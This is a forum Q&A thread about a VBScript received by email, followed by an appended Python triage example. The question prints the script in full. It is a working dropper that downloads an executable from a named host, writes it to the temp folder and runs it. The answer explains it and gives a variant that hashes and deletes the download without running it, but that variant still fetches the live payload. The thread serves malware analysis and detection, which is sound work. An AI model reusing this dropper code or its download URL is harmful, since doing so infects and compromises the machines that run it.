A. Kuc

Reputation: 21

Possible Extortion of Data

Someone sent me an email with a vbs script, but I don't know what it is as I don't know vbs.

I am guessing this is a swindle to extort some data from me, but I can't really tell what data. Can someone please explain what that script would do?

Sub HTTPUpload( myURL, myPath )
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

Upvotes: 2

Views: 181

Answers (1)

Steve Kline

Reputation: 805

As the other guy stated, it could very well be a virus. It's downloading binary data, writing it as an EXE and firing itself off. You could modify it with this code below. ... You could also just delete the email and forget that dude. I know not "Everyone" is as crazy as some of us when it comes to finding viruses in the wild... we hoard these things and study them.

I've amended some changes that would provide you with an MD5 hash and SHA256 hash that's searchable on VirusTotal and delete the file immediately after. You just need to re-append that line for HTTPUpload... and it will download... but if you see below I removed the line that was attempting to use the .Run method.

HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

The link you provided is cut off, but if you still have the vbs file, then just remove that whole section of Sub HttpUpload thru End Sub which was right before it... Replace the entire content of the vbs file except for that line mentioned above.

Sub HTTPUpload( myURL, myPath )
    Dim objShell
    Set objShell = WScript.CreateObject( "WScript.Shell" )
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    Const TemporaryFolder = 2
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    tname = objFSO.GetTempName + ".exe"
    myPath = tfolder + "/" + tname
    Set objFile = tfolder.CreateTextFile(tname)
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objFile.Close( )
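    ' Hash the file that was just written (myPath; sPath is never set inside this Sub)
    wscript.echo "    MD5Hash: " & MD5Hash(myPath) & VbCrLf & " SHA256Hash: " & Sha256Hash(myPath)
    ' Delete the download right after hashing, as described above; it is never run
    objFSO.DeleteFile myPath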
    Set objShell = Nothing
End Sub

Function MD5Hash(sPath)
    MD5Hash = bytesToHex(MD5HashBytes(GetBytes(sPath)))
End Function
Function Sha256Hash(sPath)
    Sha256Hash = bytesToHex(Sha256HashBytes(GetBytes(sPath)))
End Function

Function MD5HashBytes(aBytes)
    Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    objmd5.Initialize()
    MD5HashBytes = objmd5.ComputeHash_2( (aBytes) )
End Function

Function Sha256HashBytes(aBytes)
    'Set objsha256 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
    Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed")
    objsha256.Initialize()
    Sha256HashBytes = objsha256.ComputeHash_2( (aBytes) )
End Function

Function StringtoUTFBytes(aString)
    Set UTF8 = CreateObject("System.Text.UTF8Encoding")
    StringtoUTFBytes = UTF8.GetBytes_4(aString)
End Function

Function BytesToHex(aBytes)
    For x = 1 to LenB(aBytes)
        hexStr=Hex(Ascb(MidB((aBytes), x, 1)))
        if len(hexStr) = 1 Then hexStr ="0" & hexStr
        bytesToHex=BytesToHex & hexStr
    Next
End Function

Function BytesToBase64(varBytes)
    With CreateObject("MSXML2.DomDocument").CreateElement("b64")
        .dataType = "bin.base64"
        .nodeTypedValue = varBytes
        BytesToBase64 = .Text
    End With
End Function

Function GetBytes(sPath)
    With CreateObject("ADODB.Stream")
        .Type = 1
        .open
        .LoadFromFile sPath
        .Position = 0
        GetBytes = .Read
        .Close
    End With
End Function

Upvotes: 2
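Added example, not part of the question or the answer: a small Python triage that reads a .vbs file's text without running it and reports whether it contains the download, write-to-disk and execute chain discussed above. The function names, pattern list, sample scripts and the `example.invalid` URL are constructed for this illustration.

```python
import re

# Capability -> regexes, matched case-insensitively (VBScript ignores case).
CAPABILITIES = {
    "http_download": [r"WinHttp\.WinHttpRequest", r"MSXML2\.(Server)?XMLHTTP", r"\.ResponseBody"],
    "file_write": [r"\.CreateTextFile\b", r"\.SaveToFile\b", r"\.Write\b"],
    "temp_dir": [r"GetSpecialFolder", r"%TEMP%"],
    "exe_name": [r'"\.(exe|scr|dll)"'],
    "execute": [r"\.Run\b", r"\.Exec\b", r"\.ShellExecute\b"],
}
URL_RE = re.compile(r'https?://[^\s"]+', re.I)

# Constructed samples: the script from the question, shortened, with a placeholder URL.
ORIGINAL = '''
Set tfolder = objFSO.GetSpecialFolder(2)
Set objFile = tfolder.CreateTextFile(objFSO.GetTempName + ".exe")
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", "http://example.invalid/log.php?f=404", False
objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))
objShell.Run(myPath)
'''
AMENDED = ORIGINAL.replace("objShell.Run", "' objShell.Run")  # .Run disabled

def strip_comments(source):
    """Drop whole-line comments (' or Rem) so disabled code is not counted."""
    return "\n".join(l for l in source.splitlines()
                     if not l.lstrip().lower().startswith(("'", "rem ")))

def defang(url):
    """Make a URL non-clickable before it goes into a report or ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(source):
    code = strip_comments(source)
    found = {cap for cap, pats in CAPABILITIES.items()
             if any(re.search(p, code, re.I) for p in pats)}
    if {"http_download", "file_write", "execute"} <= found:
        verdict = "dropper: downloads a file, writes it to disk, executes it"
    elif {"http_download", "file_write"} <= found:
        verdict = "downloads and writes to disk, no execution call found"
    else:
        verdict = "no download-and-run chain found"
    return {"capabilities": sorted(found),
            "urls": [defang(u) for u in URL_RE.findall(code)],
            "verdict": verdict}

if __name__ == "__main__":
    print(triage(ORIGINAL))
```

The patterns only catch literal object and method names, so an obfuscated script (strings built with `Chr` or concatenation) can pass this check and still be a dropper.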
